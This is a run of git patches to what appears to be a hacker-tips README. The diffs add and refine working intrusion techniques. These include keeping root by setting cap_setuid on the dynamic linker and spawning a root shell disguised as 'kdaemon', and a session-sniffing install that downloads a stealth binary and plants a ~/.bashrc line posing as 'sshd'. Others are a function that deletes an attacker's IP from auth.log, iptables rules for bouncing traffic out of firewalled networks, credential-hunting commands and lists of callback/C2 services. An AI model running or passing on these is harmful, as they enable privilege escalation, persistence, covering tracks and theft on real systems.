From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Tue, 30 Apr 2024 17:11:19 +0100
Subject: [PATCH 18/37] Update README.md
---
README.md | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/README.md b/README.md
index e326505..b928df7 100644
--- a/README.md
+++ b/README.md
@@ -2152,8 +2152,9 @@ DDoS
1. [DeepNet](https://github.com/the-deepnet/ddos) - we despise DDoS but if we had to then this would be our choice.
Static Binaries / pre-compiled Tools
-1. https://github.com/Azathothas/Toolpacks/tree/main from [hysp project](https://github.com/metis-os/hysp-pkgs)
+1. https://bin/ajam.dev ([github](https://github.com/Azathothas/Toolpacks/tree/main), [hysp project](https://github.com/metis-os/hysp-pkgs))
1. https://github.com/andrew-d/static-binaries/tree/master/binaries/linux/x86_64
+2. https://lolbas-project.github.io/ (Windows)
1. https://iq.thc.org/cross-compiling-exploits
Phishing
From 150f1dd3b8be85e68dc06d097a0d8ecc80f6b1f4 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Tue, 30 Apr 2024 17:15:07 +0100
Subject: [PATCH 19/37] Update README.md
---
README.md | 8 ++++----
1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/README.md b/README.md
index b928df7..5b0eb2f 100644
--- a/README.md
+++ b/README.md
@@ -90,7 +90,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg)
1. [cryptsetup](#crypto-filesystem)
1. [EncFS](#encfs)
1. [Encrypting a file](#encrypting-file)
-1. [SSH session sniffing and hijacking](#ssh-sniffing)
+1. [Session sniffing and hijacking](#sniffing)
1. [Sniff a user's SHELL session](#session-sniffing)
2. [Sniff all SHELL sessions with dtrace](#dtrace)
2. [Sniff all SHELL sessions with eBPF](#bpf)
@@ -1675,7 +1675,7 @@ wfind() {
# Usage: wfind /etc /var /usr
```
-Find local passwords (using [noseyparker](https://github.com/praetorian-inc/noseyparker):
+Find local passwords (using [noseyparker](https://github.com/praetorian-inc/noseyparker)):
```sh
curl -o np -fsSL https://github.com/hackerschoice/binary/raw/main/tools/noseyparker-x86_64-static
./np scan . && \
@@ -1883,8 +1883,8 @@ openssl enc -d -aes-256-cbc -pbkdf2 -k fOUGsg1BJdXPt0CY4I input.
```
---
-
-## 10. SSH Sniffing
+
+## 10. Session sniffing and hijaking
**10.i Sniff a user's SHELL session**
From ae187ccbc70fc45a74bfb7dbe609620f544441c8 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Tue, 7 May 2024 09:51:00 +0100
Subject: [PATCH 20/37] Update README.md
---
README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 5b0eb2f..491f409 100644
--- a/README.md
+++ b/README.md
@@ -1898,7 +1898,7 @@ command -v bash >/dev/null || { echo "Not found: /bin/bash"; false; } \
&& curl -o ~/.config/.pty/ini -fsSL "https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m)" \
&& chmod 755 ~/.config/.pty/ini ~/.config/.pty/pty \
&& echo -e '----------\n\e[0;32mSUCCESS\e[0m. Add the following line to \e[0;36m~/.bashrc\e[0m:\e[0;35m' \
-&& echo -e '[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -x ~/.config/.pty/ini ] && [ -x ~/.config/.pty/pty ] && LC_PTY=1 exec ~/.config/.pty/ini -a "sshd: pts/0" ~/.config/.pty/pty -qaec "exec -a -bash '"$(command -v bash)"'" -I ~/.config/.pty/.@pty-unix.$$\e[0m'
+&& echo -e '[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -x ~/.config/.pty/ini ] && [ -x ~/.config/.pty/pty ] && LC_PTY=1 exec ~/.config/.pty/ini -a "sshd: pts/0" ~/.config/.pty/pty -fqaec "exec -a -bash '"$(command -v bash)"'" -I ~/.config/.pty/.@pty-unix.$$\e[0m'
```
- Combined with zapper to hide command options from the process list.
From 70b920fd8e51d69d1055f5ba03ce6fd240214f3a Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Fri, 10 May 2024 18:49:04 +0100
Subject: [PATCH 21/37] Update README.md
---
README.md | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 491f409..79cad8d 100644
--- a/README.md
+++ b/README.md
@@ -2069,7 +2069,8 @@ Many other services (for free)
| OSINT Hacker Tools ||
| --- | --- |
-| https://osint.sh | Free. Subdomain Finder, DNS History, Public S3 Buckets, Reverse IP, Certificate Search and much more |
+| https://api.c99.nl | (PAID) Subdomain Finder, Phone-Lookup, CF Resolver, WAF Detector, IP2Host, and more...for $25/year. |
+| https://osint.sh | Free. Subdomain Finder, DNS History, Public S3 Buckets, Reverse IP, Certificate Search, and more |
| https://cli.fyi | Free. curl/json interface to many services. Try `curl cli.fyi/me` or `curl cli.fyi/thc.org`. |
| https://check-your-website.server-daten.de | Free. TLS/DNS/Security check a domain. |
| https://hackertarget.com/ip-tools/ | Free OSINT Service (Reverse IP, MTR, port scan, CMS scans, Vulnerability Scans, API support) |
From ef70dc71f3950d925534855804f910b75cabdbb4 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Mon, 13 May 2024 09:46:21 +0100
Subject: [PATCH 22/37] Update README.md
---
README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 79cad8d..37bfae0 100644
--- a/README.md
+++ b/README.md
@@ -2069,7 +2069,7 @@ Many other services (for free)
| OSINT Hacker Tools ||
| --- | --- |
-| https://api.c99.nl | (PAID) Subdomain Finder, Phone-Lookup, CF Resolver, WAF Detector, IP2Host, and more...for $25/year. |
+| https://api.c99.nl | Free: [Subdomain Finder](https://subdomainfinder.c99.nl), (PAID) Phone-Lookup, CF Resolver, WAF Detector, IP2Host, and more...for $25/year. |
| https://osint.sh | Free. Subdomain Finder, DNS History, Public S3 Buckets, Reverse IP, Certificate Search, and more |
| https://cli.fyi | Free. curl/json interface to many services. Try `curl cli.fyi/me` or `curl cli.fyi/thc.org`. |
| https://check-your-website.server-daten.de | Free. TLS/DNS/Security check a domain. |
From 07be6795b24640779ea0baeef62caa2d7c13d296 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Mon, 13 May 2024 09:47:08 +0100
Subject: [PATCH 23/37] Update README.md
---
README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 37bfae0..33d584d 100644
--- a/README.md
+++ b/README.md
@@ -2069,7 +2069,7 @@ Many other services (for free)
| OSINT Hacker Tools ||
| --- | --- |
-| https://api.c99.nl | Free: [Subdomain Finder](https://subdomainfinder.c99.nl), (PAID) Phone-Lookup, CF Resolver, WAF Detector, IP2Host, and more...for $25/year. |
+| https://api.c99.nl | Free: [Subdomain Finder](https://subdomainfinder.c99.nl), PAID: Phone-Lookup, CF Resolver, WAF Detector, IP2Host, and more...for $25/year. |
| https://osint.sh | Free. Subdomain Finder, DNS History, Public S3 Buckets, Reverse IP, Certificate Search, and more |
| https://cli.fyi | Free. curl/json interface to many services. Try `curl cli.fyi/me` or `curl cli.fyi/thc.org`. |
| https://check-your-website.server-daten.de | Free. TLS/DNS/Security check a domain. |
From f807f77e5a03b3e323e738b0a1d18c21b16b0e26 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Tue, 14 May 2024 18:21:22 +0100
Subject: [PATCH 24/37] Update README.md
---
README.md | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/README.md b/README.md
index 33d584d..1e328f4 100644
--- a/README.md
+++ b/README.md
@@ -1700,11 +1700,11 @@ find_subdomains() {
[ $# -le 0 ] && { echo -en >&2 "Extract sub-domains from all files (or stdin)\nUsage : find_subdomains \nExample: find_subdomain \.com | anew"; return; }
shift 1
[ $# -le 0 ] && [ -t 0 ] && set -- .
- command -v rg >/dev/null && { rg -oaIN --no-heading "$rex" "$@" | grep -Eo "$rexf"; return; }
+ command -v rg >/dev/null && { rg -oaIN --no-heading "$rex" "$@" | grep -Eao "$rexf"; return; }
grep -Eaohr "$rex" "$@" | grep -Eo "$rexf"
}
-# find_subdomain foobar.com
-# find_subdomain @gmail.com
+# find_subdomain foobar.com | anew
+# find_subdomain @gmail.com | anew
```
---
From 3fdbe13af284e5ac86ebbc1ec3d68d81899d8009 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Tue, 14 May 2024 18:59:24 +0100
Subject: [PATCH 25/37] Update README.md
---
README.md | 7 ++++---
1 file changed, 4 insertions(+), 3 deletions(-)
diff --git a/README.md b/README.md
index 1e328f4..8c54fd0 100644
--- a/README.md
+++ b/README.md
@@ -1693,17 +1693,18 @@ grep -r -F -- " PRIVATE KEY-----" .
Find Subdomains or emails in files:
```bash
+resolv() { while read -r x; do r="$(getent hosts "$x")" || continue; echo "${r%% *}"$'\t'"${x}"; done; }
find_subdomains() {
- local d="${1}"
+ local d="${1//./\\.}"
local rexf='[0-9a-zA-Z_.-]{0,64}'"${d}"
local rex="$rexf"'([^0-9a-zA-Z_]{1}|$)'
- [ $# -le 0 ] && { echo -en >&2 "Extract sub-domains from all files (or stdin)\nUsage : find_subdomains \nExample: find_subdomain \.com | anew"; return; }
+ [ $# -le 0 ] && { echo -en >&2 "Extract sub-domains from all files (or stdin)\nUsage : find_subdomains \nExample: find_subdomain .com | anew"; return; }
shift 1
[ $# -le 0 ] && [ -t 0 ] && set -- .
command -v rg >/dev/null && { rg -oaIN --no-heading "$rex" "$@" | grep -Eao "$rexf"; return; }
grep -Eaohr "$rex" "$@" | grep -Eo "$rexf"
}
-# find_subdomain foobar.com | anew
+# find_subdomain .foobar.com | anew | resolv
# find_subdomain @gmail.com | anew
```
From f109f069eeda44ac056c636ab10448f0d4338f53 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Tue, 14 May 2024 19:04:01 +0100
Subject: [PATCH 26/37] Update README.md
---
README.md | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 8c54fd0..b63e8a0 100644
--- a/README.md
+++ b/README.md
@@ -1678,8 +1678,9 @@ wfind() {
Find local passwords (using [noseyparker](https://github.com/praetorian-inc/noseyparker)):
```sh
curl -o np -fsSL https://github.com/hackerschoice/binary/raw/main/tools/noseyparker-x86_64-static
+chmod 700 np && \
./np scan . && \
-./np report
+./np report --color=always | less -R
```
(Or use [PassDetective](https://github.com/aydinnyunus/PassDetective) to find passwords in ~/.*history)
From 0d3dfba65a1dd7a4b2b4d62f20f8b5d2247faf6e Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Mon, 27 May 2024 13:21:04 +0100
Subject: [PATCH 27/37] Update README.md
---
README.md | 7 ++++---
1 file changed, 4 insertions(+), 3 deletions(-)
diff --git a/README.md b/README.md
index b63e8a0..45562ba 100644
--- a/README.md
+++ b/README.md
@@ -1800,9 +1800,10 @@ mount -o bind,ro /boot/backdoor.cgi /var/www/cgi/blah.cgi
Needed for taking screenshots of X11 sessions (aka `xwd -root -display :0 | convert - jpg:screenshot.jpg`)
```bash
-U=$(id -u UserName) ### <-- Set UserName
-H="$(grep "$U" /etc/passwd | cut -d: -f6)"
-HOME="${H:-/tmp}" python3 -c "import os;os.setuid(${U:?});os.execl('/bin/bash', '-bash')"
+NAME="UserName" ### <-- Set UserName
+U=$(id -u ${NAME:?}) \
+&& H="$(grep "$U" /etc/passwd | cut -d: -f6)" \
+&& HOME="${H:-/tmp}" python3 -c "import os;os.setuid(${U:?});os.execl('/bin/bash', '-bash')"
# change -bash to bash to not make this a login shell.
```
From 4ec4852af6b918f4f105e826ce9b1ffb01d5b02c Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Fri, 31 May 2024 10:57:44 +0100
Subject: [PATCH 28/37] Update README.md
---
README.md | 1 +
1 file changed, 1 insertion(+)
diff --git a/README.md b/README.md
index 45562ba..2df77b3 100644
--- a/README.md
+++ b/README.md
@@ -2124,6 +2124,7 @@ OpSec
5. [EFF](https://www.eff.org/) - Clever advise for freedom figthers.
Exploits
+1. [ttyinject](https://github.com/hackerschoice/ttyinject) and [ptyspy](#10-session-sniffing-and-hijaking) for LPE.
1. [SploitScan](https://github.com/xaitax/SploitScan) - Exploit Score & PoC search (by xaitax)
1. [Traitor](https://github.com/liamg/traitor) - Tries various exploits/vulnerabilities to gain root (LPE)
1. [PacketStorm](https://packetstormsecurity.com) - Our favorite site ever since we shared a Pizza with fringe[at]dtmf.org in NYC in 2000
From 283b614ae74a4c87141e3191ba66fa573e11cf37 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Tue, 4 Jun 2024 11:28:46 +0100
Subject: [PATCH 29/37] Update README.md
---
README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 2df77b3..f13d1c0 100644
--- a/README.md
+++ b/README.md
@@ -1687,7 +1687,7 @@ chmod 700 np && \
Using `grep`:
```sh
# Find passwords (without garbage).
-grep -HEronasi '.{16}password.{,64}' .
+grep -HEronasi '.{,16}password.{,64}' .
# Find TLS or OpenSSH keys:
grep -r -F -- " PRIVATE KEY-----" .
```
From f447773fcea181bdf74905b34577fc80d6542d5f Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Tue, 11 Jun 2024 13:10:04 +0100
Subject: [PATCH 30/37] Update README.md
---
README.md | 36 +++++++++++++++++++++++-------------
1 file changed, 23 insertions(+), 13 deletions(-)
diff --git a/README.md b/README.md
index f13d1c0..254de62 100644
--- a/README.md
+++ b/README.md
@@ -604,19 +604,29 @@ More: [https://github.com/twelvesec/port-forwarding](https://github.com/twelvese
Use the host 192.168.0.100 as a Jump-Host: Forward any connection from anywhere to 192.168.0.100:53 onwards to 1.2.3.4:443.
```sh
-FPORT=53
-DSTIP=1.2.3.4
-DPORT=443
-echo 1 >/proc/sys/net/ipv4/ip_forward
+ipfwinit() {
+ echo 1 >/proc/sys/net/ipv4/ip_forward
+ echo 1 >/proc/sys/net/ipv4/conf/all/route_localnet
+ [ $# -le 0 ] && set -- "0.0.0.0/0"
+ while [ $# -gt 0 ]; do
+ iptables -t mangle -I PREROUTING -s "${1}" -p tcp -m addrtype --dst-type LOCAL -m conntrack ! --ctstate ESTABLISHED -j MARK --set-mark 1188
+ shift 1
+ done
+ iptables -t mangle -D PREROUTING -j CONNMARK --restore-mark >/dev/null 2>/dev/null
+ iptables -t mangle -I PREROUTING -j CONNMARK --restore-mark
+ iptables -I FORWARD -m mark --mark 1188 -j ACCEPT
+ iptables -t nat -I POSTROUTING -m mark --mark 1188 -j MASQUERADE
+ iptables -t nat -I POSTROUTING -m mark --mark 1188 -j CONNMARK --save-mark
+}
+ipfwinit # Allow EVERY IP to bounce
+# ipfwinit "1.2.3.4/16" "6.6.0.0/16" # Only allow these SOURCE IP's to bounce
+```
-iptables -t mangle -C PREROUTING -j CONNMARK --restore-mark || iptables -t mangle -I PREROUTING -j CONNMARK --restore-mark
-iptables -t mangle -A PREROUTING -p tcp --dport ${FPORT:?} -m addrtype --dst-type LOCAL -j MARK --set-mark 1188
-
-iptables -t nat -I PREROUTING -p tcp -m mark --mark 1188 -j DNAT --to ${DSTIP:?}:${DPORT:?}
-iptables -I FORWARD -m mark --mark 1188 -j ACCEPT
-
-iptables -t nat -I POSTROUTING -m mark --mark 1188 -j MASQUERADE
-iptables -t nat -I POSTROUTING -m mark --mark 1188 -j CONNMARK --save-mark
+Then set forwards like so:
+```sh
+ipfw 31337 144.76.220.20 22 # Bounce 31337 to segfault's ssh port.
+ipfw 31338 127.0.0.1 8080 # Bounce 31338 to the server's 8080 (localhost)
+ipfw 53 213.171.212.212 443 # Bounce 53 to gsrn-relay on port 443
```
We use this trick to reach the gsocket-relay-network (or TOR) from deep inside firewalled networks.
@@ -626,7 +636,7 @@ GS_HOST=192.168.0.100 GS_PORT=53 ./deploy.sh
```
```sh
# Access the target
-GS_HOST=1.2.3.4: GS_PORT=443 gs-netcat -i -s ...
+GS_HOST=213.171.212.212 gs-netcat -i -s ...
```
---
From 97f10cfa7d6f93490006424da0abccdc781fe669 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Tue, 11 Jun 2024 13:41:20 +0100
Subject: [PATCH 31/37] Update README.md
---
README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 254de62..50993b0 100644
--- a/README.md
+++ b/README.md
@@ -602,7 +602,7 @@ More: [https://github.com/twelvesec/port-forwarding](https://github.com/twelvese
**3.iii.c Bouncing traffic with iptables**
-Use the host 192.168.0.100 as a Jump-Host: Forward any connection from anywhere to 192.168.0.100:53 onwards to 1.2.3.4:443.
+Bounce through a host/router without needing to run a userland proxy or forwarder:
```sh
ipfwinit() {
echo 1 >/proc/sys/net/ipv4/ip_forward
From 2b618ece6753e7036ebcd742860622b58c458ff6 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Sat, 15 Jun 2024 19:37:00 +0100
Subject: [PATCH 32/37] Update README.md
---
README.md | 8 ++++++--
1 file changed, 6 insertions(+), 2 deletions(-)
diff --git a/README.md b/README.md
index 50993b0..58b1ca6 100644
--- a/README.md
+++ b/README.md
@@ -1612,7 +1612,7 @@ setcap cap_setuid+ep /lib/x86_64-linux-gnu/ld-linux-x86-64.so.2
Become root
```bash
### Execute as non-root user
-/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 /usr/bin/python3 -c 'import os;os.setuid(0);os.system("/bin/bash")'
+exec /lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 /usr/bin/python3 -c 'import os;os.setuid(0);os.execlp("bash", "kdaemon")'
```
@@ -1762,6 +1762,10 @@ This will reset the logfile to 0 without having to restart syslogd etc:
This will remove any line containing the IP `1.2.3.4` from the log file:
```sh
xlog() { local a=$(sed "/${1:?}/d" <"${2:?}") && echo "$a" >"${2:?}"; }
+```
+
+Examples:
+```sh
# xlog "1\.2\.3\.4" /var/log/auth.log
# xlog "${SSH_CLIENT%% *}" /var/log/auth.log
# xlog "^2023.* thc\.org" foo.log
@@ -1813,7 +1817,7 @@ Needed for taking screenshots of X11 sessions (aka `xwd -root -display :0 | conv
NAME="UserName" ### <-- Set UserName
U=$(id -u ${NAME:?}) \
&& H="$(grep "$U" /etc/passwd | cut -d: -f6)" \
-&& HOME="${H:-/tmp}" python3 -c "import os;os.setuid(${U:?});os.execl('/bin/bash', '-bash')"
+&& HOME="${H:-/tmp}" python3 -c "import os;os.setuid(${U:?});os.execlp('bash', '-bash')"
# change -bash to bash to not make this a login shell.
```
From 04928d143458efb364d4080be814ef9401f6d702 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Sat, 15 Jun 2024 21:37:58 +0100
Subject: [PATCH 33/37] Update README.md
---
README.md | 1 -
1 file changed, 1 deletion(-)
diff --git a/README.md b/README.md
index 58b1ca6..c8f3cc2 100644
--- a/README.md
+++ b/README.md
@@ -2185,7 +2185,6 @@ Tools
1. https://tmate.io/ - Share A screen with others
Callback / Canary / Command & Control
-1. http://dnslog.cn
1. https://app.interactsh.com
1. https://api.telegram.org
1. https://webhook.site
From e42b642f012282568c5cdb3b31c40afe7419a94e Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Mon, 17 Jun 2024 17:13:47 +0100
Subject: [PATCH 34/37] Update README.md
---
README.md | 6 +++---
1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/README.md b/README.md
index c8f3cc2..a914dfe 100644
--- a/README.md
+++ b/README.md
@@ -1814,11 +1814,11 @@ mount -o bind,ro /boot/backdoor.cgi /var/www/cgi/blah.cgi
Needed for taking screenshots of X11 sessions (aka `xwd -root -display :0 | convert - jpg:screenshot.jpg`)
```bash
-NAME="UserName" ### <-- Set UserName
+# NAME="UserName" ### <-- Set UserName
U=$(id -u ${NAME:?}) \
&& H="$(grep "$U" /etc/passwd | cut -d: -f6)" \
-&& HOME="${H:-/tmp}" python3 -c "import os;os.setuid(${U:?});os.execlp('bash', '-bash')"
-# change -bash to bash to not make this a login shell.
+&& HOME="${H:-/tmp}" python3 -c "import os;os.setuid(${U:?});os.execlp('bash', 'bash')"
+# change bash to -bash to make this a login shell.
```
---
From 840a5cd1442ad9f723d161173444dd0fcd44efa5 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Mon, 17 Jun 2024 19:49:34 +0100
Subject: [PATCH 35/37] Update README.md
---
README.md | 11 ++++++++---
1 file changed, 8 insertions(+), 3 deletions(-)
diff --git a/README.md b/README.md
index a914dfe..8d892e8 100644
--- a/README.md
+++ b/README.md
@@ -1606,13 +1606,18 @@ curl http://127.0.0.1:8080/test.php -d 0="ps fax; uname -mrs; id"
Stay root once you got root
```bash
-### Execute as root user
-setcap cap_setuid+ep /lib/x86_64-linux-gnu/ld-linux-x86-64.so.2
+setcap cap_setuid+ep /lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 2>/dev/null \
+|| setcap cap_setuid+ep /lib64/ld-2.17.so 2>/dev/null \
+|| echo >&2 "FAILED. File not found"
```
Become root
```bash
### Execute as non-root user
-exec /lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 /usr/bin/python3 -c 'import os;os.setuid(0);os.execlp("bash", "kdaemon")'
+p="python"
+command -v python3 >/dev/null && p="python3"
+[[ -f /lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 ]] && l="/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2"
+[[ -f /lib64/ld-2.17.so ]] && l="/lib64/ld-2.17.so"
+exec "${l:?}" "$p" -c 'import os;os.setuid(0);os.execlp("bash", "kdaemon")'
```
From 68904b59e1e4b8e44f5e4398abe0c82a12133ea6 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Fri, 21 Jun 2024 09:49:08 +0100
Subject: [PATCH 36/37] Update README.md
---
README.md | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 8d892e8..2e7bcd0 100644
--- a/README.md
+++ b/README.md
@@ -1920,7 +1920,7 @@ command -v bash >/dev/null || { echo "Not found: /bin/bash"; false; } \
&& curl -o ~/.config/.pty/ini -fsSL "https://github.com/hackerschoice/zapper/releases/download/v1.1/zapper-stealth-linux-$(uname -m)" \
&& chmod 755 ~/.config/.pty/ini ~/.config/.pty/pty \
&& echo -e '----------\n\e[0;32mSUCCESS\e[0m. Add the following line to \e[0;36m~/.bashrc\e[0m:\e[0;35m' \
-&& echo -e '[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && [ -x ~/.config/.pty/ini ] && [ -x ~/.config/.pty/pty ] && LC_PTY=1 exec ~/.config/.pty/ini -a "sshd: pts/0" ~/.config/.pty/pty -fqaec "exec -a -bash '"$(command -v bash)"'" -I ~/.config/.pty/.@pty-unix.$$\e[0m'
+&& echo -e '[ -z "$LC_PTY" ] && [ -t0 ] && [[ "$HISTFILE" != *null* ]] && { ~/.config/.pty/ini -h && ~/.config/.pty/pty -V; } &>/dev/null && LC_PTY=1 exec ~/.config/.pty/ini -a "sshd: pts/0" ~/.config/.pty/pty -fqaec "exec -a -bash '"$(command -v bash)"'" -I ~/.config/.pty/.@pty-unix.$$\e[0m'
```
- Combined with zapper to hide command options from the process list.
From 008bc782d2706fdbea130e38b92c19a77cd9ab06 Mon Sep 17 00:00:00 2001
From: skyper <5938498+SkyperTHC@users.noreply.github.com>
Date: Fri, 21 Jun 2024 10:01:08 +0100
Subject: [PATCH 37/37] Update README.md
---
README.md | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
diff --git a/README.md b/README.md
index 2e7bcd0..bd933e5 100644
--- a/README.md
+++ b/README.md
@@ -1821,8 +1821,9 @@ Needed for taking screenshots of X11 sessions (aka `xwd -root -display :0 | conv
```bash
# NAME="UserName" ### <-- Set UserName
U=$(id -u ${NAME:?}) \
+G=$(id -g ${NAME:?}) \
&& H="$(grep "$U" /etc/passwd | cut -d: -f6)" \
-&& HOME="${H:-/tmp}" python3 -c "import os;os.setuid(${U:?});os.execlp('bash', 'bash')"
+&& HOME="${H:-/tmp}" python3 -c "import os;os.setgid(${G:?});os.setuid(${U:?});os.execlp('bash', 'bash')"
# change bash to -bash to make this a login shell.
```